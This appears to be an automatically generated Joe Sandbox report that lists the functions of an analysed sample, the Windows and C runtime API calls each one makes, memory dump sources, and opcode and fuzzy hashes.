                                                                          • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                          • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                          • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                          Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                          • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                          • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: Msctls_Progress32
                                                                          • API String ID: 3850602802-3636473452
                                                                          • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                          • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                          • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                          • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                          Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                          • String ID:
                                                                          • API String ID: 3985565216-0
                                                                          • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                          • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                          • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                          • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                          Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _malloc.LIBCMT ref: 0041F707
                                                                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                          • _free.LIBCMT ref: 0041F71A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap_free_malloc
                                                                          • String ID: [B
                                                                          • API String ID: 1020059152-632041663
                                                                          • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                          • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                          • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                          • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                          Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                          • __calloc_crt.LIBCMT ref: 00413DB0
                                                                          • __getptd.LIBCMT ref: 00413DBD
                                                                          • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                          • _free.LIBCMT ref: 00413E07
                                                                          • __dosmaperr.LIBCMT ref: 00413E12
                                                                            • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                          • String ID:
                                                                          • API String ID: 155776804-0
                                                                          • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                          • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                          • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                          • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                          Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                            • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                          • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                          • String ID:
                                                                          • API String ID: 1957940570-0
                                                                          • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                          • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                          • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                          • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                          Function 00413D1A Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                          • ExitThread.KERNEL32 ref: 00413D4E
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                          • __freefls@4.LIBCMT ref: 00413D74
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                          • String ID:
                                                                          • API String ID: 259663610-0
                                                                          • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                          • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                                          • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                                          • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                                          Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClientRect.USER32(?,?), ref: 004302E6
                                                                          • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                          • GetClientRect.USER32(?,?), ref: 00430364
                                                                          • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                          • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                          • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                          • String ID:
                                                                          • API String ID: 3220332590-0
                                                                          • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                          • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                          • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                          • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                          Function 004577E9 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _malloc_wcslen$_strcat_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 1612042205-0
                                                                          • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                          • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                                          • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                                                          • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                          Function 0044F1D3 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 422COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove_strncmp
                                                                          • String ID: >$U$\
                                                                          • API String ID: 2666721431-237099441
                                                                          • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                          • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                                          • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                                          • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                                          Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 0044C570
                                                                          • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                          • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                          • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                          • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                          • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$InputSend
                                                                          • String ID:
                                                                          • API String ID: 2221674350-0
                                                                          • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                          • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                          • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                          • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                          Function 00444BFC Relevance: 9.2, APIs: 6, Instructions: 163COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$_wcscat
                                                                          • String ID:
                                                                          • API String ID: 2037614760-0
                                                                          • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                          • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                                          • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                                                          • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                                          Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                          • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Copy$AllocClearErrorLastString
                                                                          • String ID:
                                                                          • API String ID: 960795272-0
                                                                          • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                          • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                          • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                          • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                          Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                          • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                          • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                          • EndPaint.USER32(?,?), ref: 00447D13
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                          • String ID:
                                                                          • API String ID: 4189319755-0
                                                                          • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                          • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                          • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                          • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                          Function 0044900D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                          • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                          • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                          Memory Dump Source
